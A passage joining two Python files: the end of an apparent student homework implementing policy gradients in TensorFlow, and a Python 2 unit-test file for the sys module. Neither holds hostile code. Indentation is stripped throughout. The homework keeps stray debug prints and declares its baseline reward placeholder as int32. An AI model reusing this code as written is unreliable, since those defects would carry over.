# b. For the continuous case, the mean / log std of a Gaussian distribution over
# actions.
#
# Hint: use the 'build_mlp' function you defined in utilities.
#
# Note: these ops should be functions of the placeholder 'sy_ob_no'
#
# 2. Producing samples stochastically from the policy distribution.
# a. For the discrete case, an op that takes in logits and produces actions.
#
# Should have shape [None]
#
# b. For the continuous case, use the reparameterization trick:
# The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
#
# mu + sigma * z, z ~ N(0, I)
#
# This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
#
# Should have shape [None, ac_dim]
#
# Note: these ops should be functions of the policy network output ops.
#
# 3. Computing the log probability of a set of actions that were actually taken,
# according to the policy.
#
# Note: these ops should be functions of the placeholder 'sy_ac_na', and the
# policy network output ops.
#
#========================================================================================#
if discrete:
# YOUR_CODE_HERE
sy_logits_na = build_mlp(sy_ob_no,ac_dim,scope="build_nn",n_layers=n_layers,
size=size,
activation=tf.nn.relu)
sy_sampled_ac = tf.one_hot(tf.squeeze(tf.multinomial(sy_logits_na,1)),ac_dim) # Hint: Use the tf.multinomial op
sy_logprob_n = tf.nn.softmax_cross_entropy_with_logits_v2(labels=sy_ac_na, logits=sy_logits_na)
# Learned from https://github.com/InnerPeace-Wu/
# # Another way to do it
# N = tf.shape(sy_ob_no)[0]
# sy_prob_na = tf.nn.softmax(sy_logits_na)
# sy_logprob_n = tf.log(tf.gather_nd(sy_prob_na, tf.stack((tf.range(N), sy_ac_na), axis=1)))
else:
# YOUR_CODE_HERE
sy_mean = build_mlp(sy_ob_no,ac_dim,scope="build_nn",n_layers=n_layers,
size=size,
activation=tf.nn.relu)
sy_logstd = tf.Variable(tf.zeros(ac_dim), name='logstd',
dtype=tf.float32)
sy_std = tf.exp(sy_logstd)
sy_sampled_ac = sy_mean + tf.multiply(sy_std,tf.random_normal(tf.shape(sy_mean)))
sy_z = (sy_ac_na - sy_mean) / sy_std
sy_logprob_n = 0.5* tf.reduce_sum(tf.square(sy_z), axis=1)
#sy_logprob_n = 0.5*tf.reduce_sum(tf.squared_difference(tf.div(sy_mean,sy_std),
#tf.div(sy_ac_na,sy_std))) # Hint: Use the log probability under a multivariate gaussian.
#========================================================================================#
# ----------SECTION 4----------
# Loss Function and Training Operation
#========================================================================================#
#loss = tf.reduce_sum(tf.multiply(tf.nn.softmax_cross_entropy_with_logits_v2(labels=sy_ac_na,logits=sy_logits_na),sy_adv_n)) # Loss function that we'll differentiate to get the policy gradient.
loss = tf.reduce_sum(tf.multiply(sy_logprob_n,sy_adv_n))
update_op = tf.train.AdamOptimizer(learning_rate).minimize(loss)
#========================================================================================#
# ----------SECTION 5----------
# Optional Baseline - Defining Second Graph
#========================================================================================#
if nn_baseline:
baseline_prediction = tf.squeeze(build_mlp(
sy_ob_no,
1,
"nn_baseline",
n_layers=n_layers,
size=size))
# Define placeholders for targets, a loss function and an update op for fitting a
# neural network baseline. These will be used to fit the neural network baseline.
# YOUR_CODE_HERE
sy_rew_n = tf.placeholder(shape=[None], name="rew", dtype=tf.int32)
loss2 = tf.losses.mean_squared_error(labels=sy_rew_n,predictions=baseline_prediction)
baseline_update_op = tf.train.AdamOptimizer(learning_rate).minimize(loss2)
#========================================================================================#
# Tensorflow Engineering: Config, Session, Variable initialization
#========================================================================================#
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
sess = tf.Session(config=tf_config)
sess.__enter__() # equivalent to `with sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
ob = env.reset()
obs, acs, rewards = [], [], []
animate_this_episode=(len(paths)==0 and (itr % 30 == 0) and animate)
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.05)
obs.append(ob)
one_hot_ac = sess.run(sy_sampled_ac, feed_dict={sy_ob_no : ob[None]})
if discrete:
ac=int(np.argmax(one_hot_ac))
else:
ac=one_hot_ac
#print("helloooo",ac)
acs.append(one_hot_ac)
ob, rew, done, _ = env.step(ac) #transition dynamics P(s_t+1/s_t,a_t), r(s_t+1/s_t,a_t)
rewards.append(rew)
steps += 1
if done or steps > max_path_length:
break
path = {"observation" : np.array(obs),
"reward" : np.array(rewards),
"action" : np.array(acs)}
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > min_timesteps_per_batch:
break
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
ac_na=ac_na.reshape([-1,ac_dim])
print("helloooo",ac_na.shape)
#====================================================================================#
# ----------..----------
# Computing Q-values
#
# Your code should construct numpy arrays for Q-values which will be used to compute
# advantages (which will in turn be fed to the placeholder you defined above).
#
# Recall that the expression for the policy gradient PG is
#
# PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )]
#
# where
#
# tau=(s_0, a_0, ...) is a trajectory,
# Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
# and b_t is a baseline which may depend on s_t.
#
# You will write code for two cases, controlled by the flag 'reward_to_go':
#
# Case 1: trajectory-based PG
#
# (reward_to_go = False)
#
# Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
# entire trajectory (regardless of which time step the Q-value should be for).
#
# For this case, the policy gradient estimator is
#
# E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
#
# where
#
# Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
#
# Thus, you should compute
#
# Q_t = Ret(tau)
#
# Case 2: reward-to-go PG
#
# (reward_to_go = True)
#
# Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
# from time step t. Thus, you should compute
#
# Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
#
#
# Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
# like the 'ob_no' and 'ac_na' above.
#
#====================================================================================#
# DYNAMIC PROGRAMMING
if reward_to_go:
q_n=list()
for path in paths:
pLen=pathlength(path)
q_p=np.zeros(pLen)
q_p[pLen-1]=path['reward'][pLen-1]
for t in reversed(range(pLen-1)):
q_p[t]=path['reward'][t]+gamma*q_p[t+1]
q_p=np.array(q_p)
q_n.append(q_p)
else:
q_n=list()
for path in paths:
pLen=pathlength(path)
q_p=0
for t in range(pLen):
q_p=q_p+(gamma**t)*(path['reward'][t])
q_n.append(q_p*np.ones(pLen))
q_n=np.concatenate(q_n)
#print(q_n.shape)
#====================================================================================#
# ----------SECTION 5----------
# Computing Baselines
#====================================================================================#
if nn_baseline:
# If nn_baseline is True, use your neural network to predict reward-to-go
# at each timestep for each trajectory, and save the result in a variable 'b_n'
# like 'ob_no', 'ac_na', and 'q_n'.
#
# Hint #bl1: rescale the output from the nn_baseline to match the statistics
# (mean and std) of the current or previous batch of Q-values. (Goes with Hint
# #bl2 below.)
b_n = sess.run(baseline_prediction, feed_dict={sy_ob_no:ob_no})
b_n = normalize(b_n, np.mean(q_n), np.std(q_n))
adv_n = q_n - b_n
else:
adv_n = q_n.copy()
#====================================================================================#
# ----------SECTION 4----------
# Advantage Normalization
#====================================================================================#
if normalize_advantages:
# On the next line, implement a trick which is known empirically to reduce variance
# in policy gradient methods: normalize adv_n to have mean zero and std=1.
# YOUR_CODE_HERE
adv_n = normalize(adv_n)
#====================================================================================#
# ----------SECTION 5----------
# Optimizing Neural Network Baseline
#====================================================================================#
if nn_baseline:
# ----------SECTION 5----------
# If a neural network baseline is used, set up the targets and the inputs for the
# baseline.
#
# Fit it to the current batch in order to use for the next iteration. Use the
# baseline_update_op you defined earlier.
#
# Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
# targets to have mean zero and std=1. (Goes with Hint #bl1 above.)
# YOUR_CODE_HERE
sess.run(baseline_update_op,feed_dict={sy_ob_no:ob_no,sy_rew_n:q_n})
#====================================================================================#
# ----------SECTION 4----------
# Performing the Policy Update
#====================================================================================#
# Call the update operation necessary to perform the policy gradient update based on
# the current batch of rollouts.
#
# For debug purposes, you may wish to save the value of the loss function before
# and after an update, and then log them below.
sess.run(update_op,feed_dict={sy_ac_na:ac_na,sy_ob_no:ob_no,sy_adv_n:adv_n})
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vpg')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--reward_to_go', '-rtg', action='store_true')
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--nn_baseline', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=1)
parser.add_argument('--size', '-s', type=int, default=32)
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
reward_to_go=args.reward_to_go,
animate=args.render,
logdir=os.path.join(logdir,'%d'%0),
seed=0,
normalize_advantages=not(args.dont_normalize_advantages),
nn_baseline=args.nn_baseline,
n_layers=args.n_layers,
size=args.size
)
'''
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
reward_to_go=args.reward_to_go,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
nn_baseline=args.nn_baseline,
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# Awkward hacky process runs, because Tensorflow does not like
# repeatedly calling train_PG in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
p.join()
'''
if __name__ == "__main__":
main()
|
test_sys.py | # -*- coding: iso-8859-1 -*-
import unittest, test.test_support
import sys, cStringIO, os
import struct
class SysModuleTest(unittest.TestCase):
def test_original_displayhook(self):
import __builtin__
savestdout = sys.stdout
out = cStringIO.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(__builtin__, "_"):
del __builtin__._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assert_(not hasattr(__builtin__, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(__builtin__._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
sys.stdout = savestdout
def test_lost_displayhook(self):
olddisplayhook = sys.displayhook
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
sys.displayhook = olddisplayhook
def test_custom_displayhook(self):
olddisplayhook = sys.displayhook
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
sys.displayhook = olddisplayhook
def test_original_excepthook(self):
savestderr = sys.stderr
err = cStringIO.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError, exc:
eh(*sys.exc_info())
sys.stderr = savestderr
self.assert_(err.getvalue().endswith("ValueError: 42\n"))
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exc_clear(self):
self.assertRaises(TypeError, sys.exc_clear, 42)
# Verify that exc_info is present and matches exc, then clear it, and
# check that it worked.
def clear_check(exc):
typ, value, traceback = sys.exc_info()
self.assert_(typ is not None)
self.assert_(value is exc)
self.assert_(traceback is not None)
sys.exc_clear()
typ, value, traceback = sys.exc_info()
self.assert_(typ is None)
self.assert_(value is None)
self.assert_(traceback is None)
def clear():
try:
raise ValueError, 42
except ValueError, exc:
clear_check(exc)
# Raise an exception and check that it can be cleared
clear()
# Verify that a frame currently handling an exception is
# unaffected by calling exc_clear in a nested frame.
try:
raise ValueError, 13
except ValueError, exc:
typ1, value1, traceback1 = sys.exc_info()
clear()
typ2, value2, traceback2 = sys.exc_info()
self.assert_(typ1 is typ2)
self.assert_(value1 is exc)
self.assert_(value1 is value2)
self.assert_(traceback1 is traceback2)
# Check that an exception can be cleared outside of an except block
clear_check(exc)
def test_exit(self):
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
try:
sys.exit(0)
except SystemExit, exc:
self.assertEquals(exc.code, 0)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with one entry
# entry will be unpacked
try:
sys.exit(42)
except SystemExit, exc:
self.assertEquals(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with integer argument
try:
sys.exit((42,))
except SystemExit, exc:
self.assertEquals(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with string argument
try:
sys.exit("exit")
except SystemExit, exc:
self.assertEquals(exc.code, "exit")
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with two entries
try:
sys.exit((17, 23))
except SystemExit, exc:
self.assertEquals(exc.code, (17, 23))
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# test that the exit machinery handles SystemExits properly
import subprocess
# both unnormalized...
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit, 46"])
self.assertEqual(rc, 46)
# ... and normalized
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit(47)"])
self.assertEqual(rc, 47)
def test_getdefaultencoding(self):
if test.test_support.have_unicode:
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assert_(isinstance(sys.getdefaultencoding(), str))
# testing sys.settrace() is done in test_trace.py
# testing sys.setprofile() is done in test_profile.py
def test_setcheckinterval(self):
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEquals(sys.getcheckinterval(), n)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
if hasattr(sys, "getwindowsversion"):
v = sys.getwindowsversion()
self.assert_(isinstance(v, tuple))
self.assertEqual(len(v), 5)
self.assert_(isinstance(v[0], int))
self.assert_(isinstance(v[1], int))
self.assert_(isinstance(v[2], int))
self.assert_(isinstance(v[3], int))
self.assert_(isinstance(v[4], str))
def test_dlopenflags(self):
if hasattr(sys, "setdlopenflags"):
self.assert_(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
def test_refcount(self):
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assert_(isinstance(sys.gettotalrefcount(), int))
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assert_(
SysModuleTest.test_getframe.im_func.func_code \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
def current_frames_with_threads(self):
import threading, thread
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(thread.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = thread.get_ident()
self.assert_(main_id in d)
self.assert_(thread_id in d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assert_(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assert_(sourceline in ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assert_(0 in d)
self.assert_(d[0] is sys._getframe())
def test_attributes(self):
self.assert_(isinstance(sys.api_version, int))
self.assert_(isinstance(sys.argv, list))
self.assert_(sys.byteorder in ("little", "big"))
self.assert_(isinstance(sys.builtin_module_names, tuple))
self.assert_(isinstance(sys.copyright, basestring))
self.assert_(isinstance(sys.exec_prefix, basestring))
self.assert_(isinstance(sys.executable, basestring))
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assert_(isinstance(sys.hexversion, int))
self.assert_(isinstance(sys.maxint, int))
if test.test_support.have_unicode:
self.assert_(isinstance(sys.maxunicode, int))
self.assert_(isinstance(sys.platform, basestring))
self.assert_(isinstance(sys.prefix, basestring))
self.assert_(isinstance(sys.version, basestring))
vi = sys.version_info
self.assert_(isinstance(vi[:], tuple))
self.assertEqual(len(vi), 5)
self.assert_(isinstance(vi[0], int))
self.assert_(isinstance(vi[1], int))
self.assert_(isinstance(vi[2], int))
self.assert_(vi[3] in ("alpha", "beta", "candidate", "final"))
self.assert_(isinstance(vi[4], int))
self.assert_(isinstance(vi.major, int))
self.assert_(isinstance(vi.minor, int))
self.assert_(isinstance(vi.micro, int))
self.assert_(vi.releaselevel in
("alpha", "beta", "candidate", "final"))
self.assert_(isinstance(vi.serial, int))
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assert_(vi > (1,0,0))
def test_43581(self):
# Can't use sys.stdout, as this is a cStringIO object when
# the test runs under regrtest.
self.assert_(sys.__stdout__.encoding == sys.__stderr__.encoding)
def test_sys_flags(self):
self.failUnless(sys.flags)
attrs = ("debug", "py3k_warning", "division_warning", "division_new",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_site", "ignore_environment", "tabcheck", "verbose",
"unicode", "bytes_warning")
for attr in attrs:
self.assert_(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assert_(repr(sys.flags))
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
import subprocess,os
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.stdout.read().strip()
self.assertEqual(out, unichr(0xa2).encode("cp424"))
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.stdout.read().strip()
self.assertEqual(out, '?')
class SizeofTest(unittest.TestCase):
TPFLAGS_HAVE_GC = 1<<14
TPFLAGS_HEAPTYPE = 1L<<9
def setUp(self):
self.c = len(struct.pack('c', ' '))
self.H = len(struct.pack('H', 0))
self.i = len(struct.pack('i', 0))
self.l = len(struct.pack('l', 0))
self.P = len(struct.pack('P', 0))
# due to missing size_t information from struct, it is assumed that
# sizeof(Py_ssize_t) = sizeof(void*)
self.header = 'PP'
self.vheader = self.header + 'P'
if hasattr(sys, "gettotalrefcount"):
self.header += '2P'
self.vheader += '2P'
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
self.file = open(test.test_support.TESTFN, 'wb')
def tearDown(self):
self.file.close()
test.test_support.unlink(test.test_support.TESTFN)
def check_sizeof(self, o, size):
result = sys.getsizeof(o)
if ((type(o) == type) and (o.__flags__ & self.TPFLAGS_HEAPTYPE) or\
((type(o) != type) and (type(o).__flags__ & self.TPFLAGS_HAVE_GC))):
size += self.gc_headsize
msg = 'wrong size for %s: got %d, expected %d' \
% (type(o), result, size)
self.assertEqual(result, size, msg)
def calcsize(self, fmt):
"""Wrapper around struct.calcsize which enforces the alignment of the
end of a structure to the alignment requirement of pointer.
Note: This wrapper should only be used if a pointer member is included
and no member with a size larger than a pointer exists.
"""
return struct.calcsize(fmt + '0P')
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
h = self.header
size = self.calcsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), size(h + 'l'))
# but lists are
self.assertEqual(sys.getsizeof([]), size(h + 'P PP') + gc_header_size)
def test_default(self):
h = self.header
size = self.calcsize
self.assertEqual(sys.getsizeof(True, -1), size(h + 'l'))
def test_objecttypes(self):
# check all types defined in Objects/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# bool
check(True, size(h + 'l'))
# buffer
check(buffer(''), size(h + '2P2Pil'))
# builtin_function_or_method
check(len, size(h + '3P'))
# bytearray
samples = ['', 'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, size(vh + 'iPP') + x.__alloc__() * self.c)
# bytearray_iterator
check(iter(bytearray()), size(h + 'PP'))
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().func_closure[0], size(h + 'P'))
# classobj (old-style class)
class class_oldstyle():
def method():
pass
check(class_oldstyle, size(h + '6P'))
# instance (old-style class)
check(class_oldstyle(), size(h + '3P'))
# instancemethod (old-style class)
check(class_oldstyle().method, size(h + '4P'))
# complex
check(complex(0,1), size(h + '2d'))
# code
check(get_cell().func_code, size(h + '4i8Pi2P'))
# BaseException
check(BaseException(), size(h + '3P'))
# UnicodeEncodeError
check(UnicodeEncodeError("", u"", 0, 0, ""), size(h + '5P2PP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", "", 0, 0, ""), size(h + '5P2PP'))
# UnicodeTranslateError
check(UnicodeTranslateError(u"", 0, 1, ""), size(h + '5P2PP'))
# method_descriptor (descriptor object)
check(str.lower, size(h + '2PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size(h + '2PP'))
# getset_descriptor (descriptor object)
import __builtin__
check(__builtin__.file.closed, size(h + '2PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size(h + '2P2P'))
# dictproxy
class C(object): pass
check(C.__dict__, size(h + 'P'))
# method-wrapper (descriptor object)
check({}.__iter__, size(h + '2P'))
# dict
check({}, size(h + '3P2P' + 8*'P2P'))
x = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(x, size(h + '3P2P' + 8*'P2P') + 16*size('P2P'))
# dictionary-keyiterator
check({}.iterkeys(), size(h + 'P2PPP'))
# dictionary-valueiterator
check({}.itervalues(), size(h + 'P2PPP'))
# dictionary-itemiterator
check({}.iteritems(), size(h + 'P2PPP'))
# ellipses
check(Ellipsis, size(h + ''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size(h + '32B2iB'))
# enumerate
check(enumerate([]), size(h + 'l3P'))
# file
check(self.file, size(h + '4P2i4P3i3Pi'))
# float
check(float(0), size(h + 'd'))
# sys.floatinfo
check(sys.float_info, size(vh) + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, size(vh + '12P3i' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size(h + '9P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size(h + 'P'))
# classmethod
check(bar, size(h + 'P'))
# generator
def get_gen(): yield 1
check(get_gen(), size(h + 'Pi2P'))
# integer
check(1, size(h + 'l'))
check(100, size(h + 'l'))
# iterator
check(iter('abc'), size(h + 'lP'))
# callable-iterator
import re
check(re.finditer('',''), size(h + '2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, size(vh + 'PP') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size(h + 'lP'))
# listreverseiterator (list)
check(reversed([]), size(h + 'lP'))
# long
check(0L, size(vh + 'H') - self.H)
check(1L, size(vh + 'H'))
check(-1L, size(vh + 'H'))
check(32768L, size(vh + 'H') + self.H)
check(32768L*32768L-1, size(vh + 'H') + self.H)
check(32768L*32768L, size(vh + 'H') + 2*self.H)
# module
check(unittest, size(h + 'P'))
# None
check(None, size(h + ''))
# object
check(object(), size(h + ''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size(h + '4Pi'))
# PyCObject
# XXX
# rangeiterator
check(iter(xrange(1)), size(h + '4l'))
# reverse
check(reversed(''), size(h + 'PP'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size(h + '3P2P' + PySet_MINSIZE*'lP' + 'lP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*struct.calcsize('lP'))
check(frozenset(sample), s + newsize*struct.calcsize('lP'))
# setiterator
check(iter(set()), size(h + 'P3P'))
# slice
check(slice(1), size(h + '3P'))
# str
check('', struct.calcsize(vh + 'li') + 1)
check('abc', struct.calcsize(vh + 'li') + 1 + 3*self.c)
# super
check(super(int), size(h + '3P'))
# tuple
check((), size(vh))
check((1,2,3), size(vh) + 3*self.P)
# tupleiterator
check(iter(()), size(h + 'lP'))
# type
# (PyTypeObject + PyNumberMethods + PyMappingMethods +
# PySequenceMethods + PyBufferProcs)
s = size(vh + 'P2P15Pl4PP9PP11PI') + size('41P 10P 3P 6P')
class newstyleclass(object):
pass
check(newstyleclass, s)
# builtin type
check(int, s)
# NotImplementedType
import types
check(types.NotImplementedType, s)
# unicode
usize = len(u'\0'.encode('unicode-internal'))
samples = [u'', u'1'*100]
# we need to test for both sizes, because we don't know if the string
# has been cached
for s in samples:
check(s, size(h + 'PPlP') + usize * (len(s) + 1))
# weakref
import weakref
check(weakref.ref(int), size(h + '2Pl2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size(h + '2Pl2P'))
# xrange
check(xrange(1), size(h + '3l'))
check(xrange(66000), size(h + '3l'))
def test_pythontypes(self):
# check all types defined in Python/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size(h + ''))
# imp.NullImporter
import imp
check(imp.NullImporter(self.file.name), size(h + ''))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb != None:
check(tb, size(h + '2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, size(vh) + self.P * len(sys.flags))
def test_main():
test_classes = (SysModuleTest, SizeofTest)
test.test_support.run_unittest(*test_classes)
if __name__ == "__main__":
